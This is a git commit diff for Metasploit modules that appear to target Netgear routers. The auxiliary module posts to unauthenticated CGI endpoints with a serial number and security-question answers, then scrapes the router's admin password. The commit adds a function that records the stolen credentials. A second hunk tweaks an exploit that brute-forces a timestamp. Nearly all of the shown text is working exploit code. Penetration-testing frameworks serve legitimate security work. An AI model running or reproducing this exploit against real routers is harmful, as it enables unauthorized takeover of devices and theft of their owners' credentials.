made changes suggested
parent
9d3e90e8e5
commit
d95a3ff2ac
|
@ -96,31 +96,31 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
# 1: send serial number
|
# 1: send serial number
|
||||||
res = send_request_cgi({
|
send_request_cgi({
|
||||||
'uri' => '/apply_noauth.cgi?/unauth.cgi',
|
'uri' => '/apply_noauth.cgi?/unauth.cgi',
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
'vars_post' =>
|
'vars_post' =>
|
||||||
{
|
{
|
||||||
'submit_flag' => 'match_sn',
|
'submit_flag' => 'match_sn',
|
||||||
'serial_num' => serial,
|
'serial_num' => serial,
|
||||||
'continue' => '+Continue+'
|
'continue' => '+Continue+'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
# 2: send answer to secret questions
|
# 2: send answer to secret questions
|
||||||
res = send_request_cgi({
|
send_request_cgi({
|
||||||
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
|
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
'vars_post' =>
|
'vars_post' =>
|
||||||
{
|
{
|
||||||
'submit_flag' => 'security_question',
|
'submit_flag' => 'security_question',
|
||||||
'answer1' => @q1,
|
'answer1' => @q1,
|
||||||
'answer2' => @q2,
|
'answer2' => @q2,
|
||||||
'continue' => '+Continue+'
|
'continue' => '+Continue+'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
# 3: PROFIT!!!
|
# 3: PROFIT!!!
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
if res && res.body =~ /Admin Password: (.*)<\/TD>/
|
if res && res.body =~ /Admin Password: (.*)<\/TD>/
|
||||||
password = $1
|
password = $1
|
||||||
if password.nil? or password == ""
|
if password.blank?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
|
@ -145,6 +145,33 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
return [username, password]
|
return [username, password]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def report_cred(opts)
|
||||||
|
service_data = {
|
||||||
|
address: opts[:ip],
|
||||||
|
port: opts[:port],
|
||||||
|
service_name: 'netgear',
|
||||||
|
protocol: 'tcp',
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :service,
|
||||||
|
module_fullname: fullname,
|
||||||
|
username: opts[:user],
|
||||||
|
private_data: opts[:password],
|
||||||
|
private_type: :password
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
login_data = {
|
||||||
|
last_attempted_at: DateTime.now,
|
||||||
|
core: create_credential(credential_data),
|
||||||
|
status: Metasploit::Model::Login::Status::SUCCESSFUL,
|
||||||
|
proof: opts[:proof]
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
create_credential_login(login_data)
|
||||||
|
end
|
||||||
|
|
||||||
def send_req(timestamp)
|
def send_req(timestamp)
|
||||||
begin
|
begin
|
||||||
|
@ -211,6 +238,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
credentials = get_creds
|
credentials = get_creds
|
||||||
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
||||||
|
report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# no shell? let's just go on and bruteforce the timestamp
|
# no shell? let's just go on and bruteforce the timestamp
|
||||||
# 3: get the current date from the router and parse it
|
# 3: get the current date from the router and parse it
|
||||||
end_time = get_current_time
|
end_time = get_current_time
|
||||||
if end_time == nil
|
if end_time.nil?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
||||||
end
|
end
|
||||||
if end_time <= datastore['TIME_OFFSET']
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
|
Loading…
Reference in New Issue